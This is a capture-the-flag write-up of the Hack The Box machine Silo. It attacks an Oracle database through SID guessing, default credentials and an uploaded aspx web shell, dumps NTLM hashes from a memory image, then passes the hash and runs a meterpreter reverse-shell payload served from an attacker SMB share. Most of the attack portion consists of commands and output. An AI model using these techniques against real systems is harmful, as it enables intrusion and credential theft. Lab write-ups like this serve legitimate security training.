Introduction

This is probably one of the few times I voluntarily attempted to take a crack at attacking an Oracle database server. I've had a little experience messing around with Oracle databases at work, but I can't say I knew much, or anything at all, about them. This box was pretty valuable to me since I got to learn some techniques and tactics for attacking Oracle databases. Once you got over the first hurdle, Silo wasn't an overly obtuse box.

Enumeration

Initial Scanning

Like with every box, let's begin with a scan of the machine Silo (10.10.10.82). I've started to really enjoy using HTB almot's htbscan.py script.

# Nmap 7.70 scan initiated Sun Jun 24 11:48:59 2018 as: nmap -sV -A -v -p49158,49153,1521,80,139,49161,49160,5985,49155,135,49154,49162,47001,445 -oA nmap/open_ports 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.15s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%), Microsoft Windows Server 2008 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.074 days (since Sun Jun 24 10:05:06 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-06-24 11:51:05
|_  start_date: 2018-06-24 10:05:23

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   155.91 ms 10.10.14.1
2   154.66 ms 10.10.10.82

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 24 11:51:27 2018 -- 1 IP address (1 host up) scanned in 148.15 seconds

Right off the bat we see some interesting services listening that will be worth investigating: an Oracle TNS listener (Oracle database) on 1521, SMB on port 445, and a web service on port 80.
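To make a scan like this quicker to triage, here is a small parser for nmap's normal output format. It is an added example for this write-up, not code from the original post or from the nmap project. It turns each port line into a record, attaches the NSE script output that follows it to that port, and summarises which database and Windows management services are exposed and which HTTP methods nmap flagged as risky. The scan excerpt embedded in it is constructed from the output above, and the function names are my own.

```python
"""Parse nmap normal (-oN) output into port records and summarise exposed services.

Added example for this write-up; not code from the original post or the nmap
project. SAMPLE_SCAN is a constructed excerpt of the scan output shown above.
"""
import re

# "80/tcp    open  http       Microsoft IIS httpd 8.5"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

SAMPLE_SCAN = """\
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
"""


def _script_body(line):
    """Strip nmap's '| ' / '|_' prefix; nested output keeps its extra indentation."""
    body = line[1:]
    return body[1:] if body[:1] in ("_", " ") else body


def parse_nmap(text):
    """Return a list of port records; NSE output is attached to the preceding port."""
    ports, current, script = [], None, None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": {},  # script name -> list of output lines
            }
            ports.append(current)
            script = None
        elif current is not None and line.startswith("|"):
            body = _script_body(line)
            if body[:1].isspace():
                # indented continuation line belongs to the current script
                if script is not None:
                    current["scripts"][script].append(body.strip())
            else:
                # top-level "name: value" line starts a new script entry
                script, _, value = body.partition(":")
                current["scripts"][script] = [value.strip()] if value.strip() else []
    return ports


def exposed_services(ports, names=("oracle-tns", "microsoft-ds", "msrpc")):
    """Open ports carrying services that should not normally face untrusted networks."""
    return [(p["port"], p["service"], p["version"])
            for p in ports if p["state"] == "open" and p["service"] in names]


def risky_http_methods(ports):
    """Map port -> methods that nmap's http-methods script flagged as potentially risky."""
    flagged = {}
    for p in ports:
        for item in p["scripts"].get("http-methods", []):
            if item.startswith("Potentially risky methods:"):
                flagged[p["port"]] = item.split(":", 1)[1].split()
    return flagged


if __name__ == "__main__":
    records = parse_nmap(SAMPLE_SCAN)
    for port, service, version in exposed_services(records):
        print(f"{port}/tcp {service}: {version}")
    print("risky HTTP methods:", risky_http_methods(records))
```

Feeding the full scan above through `parse_nmap` yields the same three items the write-up calls out by hand (1521 and 49160 for Oracle, 445 for SMB) plus the TRACE method on port 80, which is the kind of summary you would paste into a finding rather than the raw nmap dump.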

Enumerating IIS - Port 80

We attempt to discover hidden directories or content, but that comes up with nothing valuable.

root@dastinia:~/htb/silo# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.82 -x asp,aspx -s 200,204,301,302,307,403 -t 100 | tee gobuster_silo

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.82/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,403,200,204
[+] Extensions   : .asp,.aspx
=====================================================

Enumerating Oracle DB - Port 1521

I wrote a quick ODAT installation tutorial a few days prior, since some people were having issues installing ODAT on Kali.

ODAT is an open source penetration testing tool aimed at attacking and auditing the security of Oracle Database servers.

I then read up on some Oracle Database attack methodologies:

[1] - https://www.slideshare.net/martintoshev/oracle-database-12c-attack-vectors

[2] - https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/

[3] - http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

[4] - http://pentestdiary.blogspot.com/2017/08/oracle-database-penetration-testing.html

The general methodology I took away from them was that we need to:

1. Enumerate the Oracle Database version.
2. Discover SIDs (basically Oracle's term for a unique database instance).
3. Obtain a user account (likely through brute-forcing).
4. Exploit / escalate privileges as needed.
5. Repeat.

From our Nmap scan we already know that the Oracle database is running version 11.2.0.2.0.

We can use ODAT's sidguesser module to discover valid SIDs.

root@dastinia:/opt/odat# ./odat.py sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'SAMPLE' is a valid SID. Continue...
[+] 'SCAN4' is a valid SID. Continue...
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |########################################| Time: 00:10:55
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |########################################| Time: 00:00:12
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |########################################| Time: 00:07:31
[+] SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB

We can use the Metasploit module admin/oracle/oracle_login to brute-force default credentials against the discovered SID.

msf > use admin/oracle/oracle_login
msf auxiliary(admin/oracle/oracle_login) > options

Module options (auxiliary/admin/oracle/oracle_login):

   Name     Current Setting                                                               Required  Description
   ----     ---------------                                                               --------  -----------
   CSVFILE  /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv  no        The file that contains a list of default accounts.
   RHOST                                                                                  yes       The Oracle host.
   RPORT    1521                                                                          yes       The TNS port.
   SID      ORCL                                                                          yes       The sid to authenticate with.

msf auxiliary(admin/oracle/oracle_login) > set RHOST 10.10.10.82
RHOST => 10.10.10.82
msf auxiliary(admin/oracle/oracle_login) > set SID XE
SID => XE
msf auxiliary(admin/oracle/oracle_login) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting brute force on 10.10.10.82:1521...
[+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE
[*] Auxiliary module execution completed

The module finds a valid user account: scott:tiger.

We also discover that this account can connect to the database as SYSDBA.

failed connection as sysoper

root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysoper

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:14:55 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

ERROR:
ORA-01031: insufficient privileges

Enter user-name:

connecting as sysdba

root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysdba

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:15:23 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

Exploitation

Reading over ODAT's modules, there are a few we could leverage for code execution or arbitrary file upload/read.

The ODAT developer was kind enough to provide a wiki of all the modules, with some examples:

utlfile - Upload files from our local machine to the database server, or download files from it.

externaltable - Execute a binary with the privileges of the Oracle database server process (only if the binary is reachable from the server).

ctxsys - Read a file from the database server.

dbmsadvisor - Upload a file to the database server.

So some attack paths we can take:

1. Since a web service is running on the box, upload a web shell (aspx) and use it to interact with the server.
2. Upload a binary payload, like something generated with msfvenom, and execute it.
3. Read potentially sensitive files which we can attempt to use for further privilege escalation.

I used the first method, since we will end up discovering that the Oracle database was running with SYSTEM privileges.

I used the following aspx web shell and uploaded it to the well-known default IIS web root directory, C:\inetpub\wwwroot.

root@dastinia:/opt/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/htb/silo/silo_shell.aspx --sysdba

[1] (10.10.10.82:1521): Put the /root/htb/silo/silo_shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server
[+] The /root/htb/silo/silo_shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file

Analyzing Memory Dump with Volatility

On the box we find a note with a Dropbox link and a password for what appears to be a memory dump.

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$

Let's begin analyzing this memory dump by inspecting the running processes.

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe00000089940 System                    4      0     84        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe00000c9c100 smss.exe                208      4      3        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe000034f54c0 csrss.exe               324    316     10        0      0      0 2018-01-05 22:17:15 UTC+0000
0xffffe000034ec380 csrss.exe               396    388     10        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe000034ac940 wininit.exe             404    316      4        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00002fee080 winlogon.exe            448    388      5        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003550940 services.exe            492    404     10        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003ed4080 lsass.exe               500    404      6        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f22500 svchost.exe             560    492     15        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f39940 svchost.exe             604    492     15        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f6f680 dwm.exe                 688    448      9        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f68940 vmacthlp.exe            708    492      2        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003fb9080 svchost.exe             764    492     16        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00003fcc940 svchost.exe             800    492     63        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00003fe3940 svchost.exe             832    492     20        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004e267c0 svchost.exe             920    492     25        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004e8d940 svchost.exe             340    492     16        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f2e940 spoolsv.exe             308    492     13        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f5c940 svchost.exe            1052    492     11        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f84940 oracle.exe             1088    492     30        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004fe93c0 OraClrAgnt.exe         1192    492      2        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004fef940 TNSLSNR.EXE            1208    492      5        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004ff0300 agtctl.exe             1216   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004ff3940 agtctl.exe             1264   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004ffc440 svchost.exe            1272    492      4        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004fff080 VGAuthService.         1324    492      3        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060568c0 agtctl.exe             1348   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe000060767c0 agtctl.exe             1388   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe0000608f780 vmtoolsd.exe           1444    492      8        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060a62c0 ManagementAgen         1492    492      9        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060c7940 svchost.exe            1516    492     16        0      0      0 2018-01-05 22:17:19 UTC+0000
0xffffe00003051940 svchost.exe            2000    492      5        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe00003077880 TPAutoConnSvc.         1256    492      8        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030a1080 dllhost.exe            1432    492     21        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030b7940 dllhost.exe            1600    492     17        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030cd940 WmiPrvSE.exe           1440    560     12        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030cf940 msdtc.exe              2052    492     13        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe00003117940 VSSVC.exe              2228    492      7        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe00003149080 sppsvc.exe             2284    492      5        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe0000315f940 SppExtComObj.E         2312    560      5        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe000061637c0 taskhostex.exe         2368    800      7        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00004e00680 explorer.exe           2424   2416     56        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00000df34c0 ServerManager.         2732   2376     24        0      1      0 2018-01-05 22:17:35 UTC+0000
0xffffe0000301c940 TPAutoConnect.         2824   1256      3        0      1      0 2018-01-05 22:17:37 UTC+0000
0xffffe00003f698c0 conhost.exe            2832   2824      1        0      1      0 2018-01-05 22:17:37 UTC+0000
0xffffe0000136d080 vmtoolsd.exe           2992   2424      8        0      1      0 2018-01-05 22:17:45 UTC+0000
0xffffe00003224540 WmiPrvSE.exe           3056    560     19        0      0      0 2018-01-05 22:17:47 UTC+0000
0xffffe00003239940 WmiPrvSE.exe           2340    560     10        0      0      0 2018-01-05 22:17:47 UTC+0000
0xffffe0000325c940 WmiApSrv.exe            864    492      5        0      0      0 2018-01-05 22:17:48 UTC+0000
0xffffe00003203340 DumpIt.exe             2932   2424      4        0      1      0 2018-01-05 22:18:06 UTC+0000
0xffffe00003f8c940 conhost.exe            2764   2932      2        0      1      0 2018-01-05 22:18:06 UTC+0000

It looks like the forensics tool DumpIt was used to create this memory dump (PID 2932, a child of explorer.exe in session 1), which likely means it was run interactively with admin privileges.
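The reasoning in the previous paragraph (find the acquisition tool, then look at its parent and session) is easy to automate over the pslist output. The following is an added example for this write-up, not code from the original post or from the Volatility project: it parses Volatility 2's whitespace-aligned pslist table into records, walks parent PIDs to reconstruct a process's ancestry, and reports where a named tool ran. The listing embedded in it is a constructed excerpt of the table above; function names are my own.

```python
"""Reconstruct process ancestry from Volatility 2 `pslist` output.

Added example for this write-up; not code from the original post or from the
Volatility project. SAMPLE_PSLIST is a constructed excerpt of the listing above.
"""

SAMPLE_PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe00000089940 System                    4      0     84        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe000034ac940 wininit.exe             404    316      4        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003550940 services.exe            492    404     10        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00004f84940 oracle.exe             1088    492     30        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004fe93c0 OraClrAgnt.exe         1192    492      2        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004ff0300 agtctl.exe             1216   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004e00680 explorer.exe           2424   2416     56        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00003203340 DumpIt.exe             2932   2424      4        0      1      0 2018-01-05 22:18:06 UTC+0000
0xffffe00003f8c940 conhost.exe            2764   2932      2        0      1      0 2018-01-05 22:18:06 UTC+0000
"""


def parse_pslist(text):
    """Return {pid: record}; header, separator and tool banner lines are skipped."""
    procs = {}
    for line in text.splitlines():
        t = line.split()
        # a process row starts with a kernel offset and carries at least a start timestamp
        if len(t) < 11 or not t[0].startswith("0x"):
            continue
        procs[int(t[2])] = {
            "offset": t[0],
            "name": t[1],
            "pid": int(t[2]),
            "ppid": int(t[3]),
            "threads": int(t[4]),
            # Sess is "------" for System and smss.exe, which have no session
            "session": None if t[6].startswith("-") else int(t[6]),
            "start": " ".join(t[8:11]),
            # exited processes carry a second timestamp in the Exit column
            "exit": " ".join(t[11:14]) if len(t) >= 14 else None,
        }
    return procs


def ancestry(procs, pid):
    """Names from the given process up to the highest ancestor present in the listing."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain


def children(procs, pid):
    """PIDs whose parent is the given process."""
    return sorted(p["pid"] for p in procs.values() if p["ppid"] == pid)


def find_tool(procs, name):
    """Where a named tool ran: (pid, session, start time, ancestry) for each instance."""
    return [(p["pid"], p["session"], p["start"], ancestry(procs, p["pid"]))
            for p in procs.values() if p["name"].lower() == name.lower()]


if __name__ == "__main__":
    procs = parse_pslist(SAMPLE_PSLIST)
    for pid, session, start, chain in find_tool(procs, "DumpIt.exe"):
        print(f"pid {pid} session {session} started {start}: {' <- '.join(chain)}")
    print("exited:", [p["name"] for p in procs.values() if p["exit"]])
```

On the real listing, `find_tool(procs, "DumpIt.exe")` returns the chain DumpIt.exe <- explorer.exe in session 1, and explorer's parent (PID 2416) is absent from the table, which is normal: the userinit.exe that spawns the shell exits before the dump was taken.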

We can use Volatility's hashdump module to dump the hashes of the accounts stored on the system; this is the equivalent of running hashdump from meterpreter. We first need the virtual offsets of the SYSTEM and SAM hives from the hivelist module, which happen to be 0xffffc00000028000 and 0xffffc00000619000 respectively.

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat

dumping hashes

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
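Picking the two hive offsets out of hivelist by hand and then reading the hashdump lines is error-prone (the SECURITY hive sits right above SAM in the listing and is easy to grab by mistake). Here is an added example for this write-up, not code from the original post or from the Volatility project, that covers both steps: it maps hive names to virtual offsets, builds the `-y`/`-s` arguments hashdump expects (SYSTEM for the boot key, SAM for the account data), parses the pwdump-style output, and flags accounts with an empty password or a stored LM hash. Both embedded samples are constructed excerpts of the output above; the two empty-password hash constants are the well-known values, and the function names are my own.

```python
"""Locate SYSTEM and SAM in `hivelist` output and audit the `hashdump` result.

Added example for this write-up; not code from the original post or from the
Volatility project. The two samples are constructed excerpts of the outputs
shown above; EMPTY_LM / EMPTY_NT are the well-known empty-password hashes.
"""

# LM field stored when LM hashing is disabled, and the NT hash of an empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_HIVELIST = r"""
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat
"""

SAMPLE_HASHDUMP = """\
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""


def hive_offsets(text):
    """Map hive file basename (upper-cased) -> virtual offset, e.g. 'SAM' -> '0x...'."""
    offsets = {}
    for line in text.splitlines():
        t = line.split(None, 2)
        # data rows carry two hex addresses followed by the hive path
        if len(t) == 3 and t[0].startswith("0x") and t[1].startswith("0x"):
            offsets[t[2].rsplit("\\", 1)[-1].upper()] = t[0]
    return offsets


def hashdump_args(offsets):
    """hashdump needs the SYSTEM hive (-y, boot key) and the SAM hive (-s, accounts)."""
    return ["-y", offsets["SYSTEM"], "-s", offsets["SAM"]]


def parse_hashdump(text):
    """Parse pwdump-style lines: user:rid:lmhash:nthash:::"""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # banner, prompt or warning line, not an account
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def audit_accounts(accounts):
    """Flag accounts whose stored hashes indicate a weak state: {user: [notes]}."""
    findings = {}
    for a in accounts:
        notes = []
        if a["nt"] == EMPTY_NT:
            notes.append("empty password")
        if a["lm"] != EMPTY_LM:
            notes.append("LM hash present (legacy, easily cracked)")
        if notes:
            findings[a["user"]] = notes
    return findings


if __name__ == "__main__":
    offsets = hive_offsets(SAMPLE_HIVELIST)
    print("hashdump", " ".join(hashdump_args(offsets)))
    print(audit_accounts(parse_hashdump(SAMPLE_HASHDUMP)))
```

On the real output the audit only flags Guest (its NT hash is the empty-password value), while every account shows the fixed LM placeholder, i.e. LM hashing was disabled on this host.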

Getting System

Now we can use the hashes we dumped with a tool like pth-winexe on Kali to get a shell with administrator privileges.

root@dastinia:~/Desktop# pth-winexe -U "Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::" //10.10.10.82 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
silo\administrator

C:\Windows\system32>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd3...[redacted]....

Getting System v2

We can use the externaltable module to execute a binary (or command) on the system. Combining impacket-smbserver with externaltable gives us remote code execution.

generating our payload

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.98 LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

Start up an impacket-smbserver

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

execute our payload stored on our smb share

root@dastinia:/opt/odat# ./odat.py externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\\\10.10.14.98\\kk 6969.exe

[1] (10.10.10.82:1521): Execute the 6969.exe command stored in the \\10.10.14.98\kk path

getting system shell